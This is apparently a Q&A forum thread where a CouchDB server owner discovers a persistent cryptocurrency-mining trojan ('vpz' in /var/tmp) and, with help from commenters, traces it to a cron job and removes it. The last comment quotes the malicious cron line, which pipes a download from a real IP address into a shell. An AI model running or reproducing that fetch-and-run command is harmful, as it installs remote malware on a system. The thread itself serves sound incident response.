# couchdb user with command vpz

Tags: couchdb

I am running `couchdb` on my Ubuntu server but there is a process running as the `couchdb` user called `vpz`.

I don't know what this is but it is running at over 150% of CPU.

I've stopped `couchdb` from running.
I kill the process but after about 10 seconds it comes back.

Does anyone know what this is, or how to stop it from using so much CPU?

The process, vpz, is running as the user couchdb.
Output of ps -u couchdb below:

```
    ps -u couchdb
  PID TTY          TIME CMD
 9267 ?        04:50:06 vpz
10232 ?        00:10:09 beam.smp
10252 ?        00:00:00 sh
10337 ?        00:01:56 couchjs
10391 ?        00:02:52 couchjs
10393 ?        00:00:44 couchjs
10397 ?        00:01:31 couchjs
11013 ?        00:01:51 couchjs
12127 ?        00:00:57 couchjs
19805 ?        00:00:00 sh
19807 ?        00:00:00 sh
19855 ?        00:00:00 sleep
```

Output of grep couchdb /etc/passwd

```
grep couchdb /etc/passwd
couchdb:x:110:118:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash
```

Output of sudo find / -name vpz

```
sudo find / -name vpz
[sudo] password for admin:
/var/tmp/vpz
```

Comment: please [edit] your question, and add the output of `ps -u vpz` and `grep vpz /etc/passwd`

Comment: Outputs of commands added. No user vpz - this is the name of the command. The user is run as couchdb.

Comment: I've checked `couchdb` source code, and it doesn't hold any `vpz` inside. (it does hold `couchjs` and `beam`)

Comment: please [edit] your question, with the result of `sudo find / -name vpz`

Comment: Thanks. Found the file at /var/tmp/vpz. But it says it is not a text file so cannot see inside. Would it be safe to delete it?

Comment: I have a feeling that it is a virus/trojan. Would be better to save a copy for analysis. I have a feeling that if you will delete it, it will be created again

Comment: Thanks for the help. I've deleted it and am monitoring my processes to see if it spawns again. Any help on how to search for a Trojan/virus and get rid of it? Thanks again for the help.

Answer (score 0):

Turns out this is indeed a Bitcoin Mining Trojan. 
Everytime I delete the command it comes back after a few minutes. 
I did some googling for this and found a partial solution.
Basically there is a cron job in the couchdb user profile
First stop couchdb

```
sudo service couchdb stop
```

Run the following commands to find that crontab and remove the line there.
    sudo -i
    su couchdb
    crontab -e

Remove the files in /var/tmp and also in /tmp as there are some files in there that are also owned by couchdb.

After that I need to upgrade my couchdb installation.

Comment: I'd consider format/reinstalling Ubuntu from zero (after performing backup to all your personal data) - this should ensure that you won't have any hidden trojan/viruses in your system

Comment: You saved my couchdb! In `sudo -i su couchdb` and `crontab -e` there was a cronjob `curl http://94.250.253.178/logo6.jpg|sh` that caused `/var/tmp/vpz` to reload once killed.